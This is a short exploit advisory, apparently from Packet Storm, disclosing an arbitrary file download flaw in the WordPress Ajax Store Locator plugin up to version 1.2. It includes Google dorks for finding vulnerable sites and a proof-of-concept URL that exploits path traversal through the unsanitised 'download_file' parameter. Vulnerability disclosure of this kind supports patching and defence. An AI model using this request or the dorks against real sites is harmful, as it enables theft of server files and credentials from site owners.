WordPress Ajax Store Locator 1.2 Arbitrary File Download

2014-12-07T00:00:00
ID PACKETSTORM:129408
Type packetstorm
Reporter Claudio Viviani
Modified 2014-12-07T00:00:00

Description

                                        
                                            `######################  
  
# Exploit Title : Wordpress Ajax Store Locator <= 1.2 Arbitrary File Download  
  
# Exploit Author : Claudio Viviani  
  
# Vendor Homepage : http://codecanyon.net/item/ajax-store-locator-wordpress/5293356  
  
# Software Link : Premium  
  
# Dork Google: inurl:ajax-store-locator  
# index of ajax-store-locator   
  
# Date : 2014-12-06  
  
# Tested on : Windows 7 / Mozilla Firefox  
# Linux / Mozilla Firefox  
  
######################  
  
# PoC Exploit:  
  
http://TARGET/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=[../../nomefile]  
  
"download_file" variable is not sanitized.  
  
  
#####################  
  
Discovered By : Claudio Viviani  
http://www.homelab.it  
  
info@homelab.it  
homelabit@protonmail.ch  
  
https://www.facebook.com/homelabit  
https://twitter.com/homelabit  
https://plus.google.com/+HomelabIt1/  
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww  
  
#####################  
`